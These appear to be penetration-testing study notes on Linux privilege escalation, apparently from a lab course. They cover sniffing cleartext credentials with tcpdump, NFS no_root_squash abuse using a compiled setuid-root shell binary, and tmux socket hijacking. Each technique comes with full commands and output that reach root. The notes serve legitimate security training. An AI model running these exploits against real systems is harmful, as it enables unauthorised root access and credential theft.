Miscellaneous

Passive Traffic Capture

If tcpdump is installed, unprivileged users may be able to capture network traffic, including, in some cases, credentials passed in cleartext. Several tools, such as net-creds and PCredz, can be used to examine the data passing on the wire. This may result in capturing sensitive information such as credit card numbers and SNMP community strings. It may also be possible to capture Net-NTLMv2, SMBv2, or Kerberos hashes, which could be subjected to an offline brute-force attack to reveal the plaintext password. Cleartext protocols such as HTTP, FTP, POP, IMAP, telnet, or SMTP may carry credentials that could be reused to escalate privileges on the host.

Weak NFS Privileges

Sample Exploitation (Check hacktricks)

  1. Check whether any export is configured with no_root_squash

    $ cat /etc/exports
    
    # /etc/exports: the access control list for filesystems which may be exported
    #		to NFS clients.  See exports(5).
    #
    # Example for NFSv2 and NFSv3:
    # /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
    #
    # Example for NFSv4:
    # /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
    # /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
    #
    /var/nfs/general *(rw,no_root_squash)
    /tmp *(rw,no_root_squash)
  2. Create a binary on the attacker machine

    $ cat shell.c 
    
    #include <stdio.h>
    #include <stdlib.h>     /* system() */
    #include <sys/types.h>
    #include <unistd.h>     /* setuid(), setgid() */
    int main(void)
    {
      /* once the binary is SUID root on the export, this runs as root */
      setuid(0); setgid(0); system("/bin/bash");
      return 0;
    }
    
    $ gcc shell.c -o shell
  3. Mount the exported /tmp directory on /mnt, copy the binary, and set the necessary permissions (the SUID bit).

    $ sudo mount -t nfs 10.129.2.12:/tmp /mnt
    $ cp shell /mnt
    $ chmod u+s /mnt/shell
  4. Switch to the low-privileged user on the target and execute the binary

    $ ls -la
    
    total 68
    drwxrwxrwt 10 root  root   4096 Sep  1 06:15 .
    drwxr-xr-x 24 root  root   4096 Aug 31 02:24 ..
    -rwsr-xr-x  1 root  root  16712 Sep  1 06:15 shell
    
    $ ./shell

Hijacking TMUX Sessions

Sample Exploitation

  1. Assuming that this command was run previously

    $ tmux -S /shareds new -s debugsess
    $ chown root:devs /shareds
  2. If we can pwn an account belonging to the devs group, we can attach to that session and gain root

  3. Check for running tmux processes

    $ ps aux | grep tmux
    
    root      4806  0.0  0.1  29416  3204 ?        Ss   06:27   0:00 tmux -S /shareds new -s debugsess
  4. Confirm permissions

    $ ls -la /shareds 
    
    srw-rw---- 1 root devs 0 Sep  1 06:27 /shareds
  5. Confirm we are in devs group

    $ id
    
    uid=1000(htb) gid=1000(htb) groups=1000(htb),1011(devs)
  6. Attach to the tmux session

    $ tmux -S /shareds
    
    id
    
    uid=0(root) gid=0(root) groups=0(root)
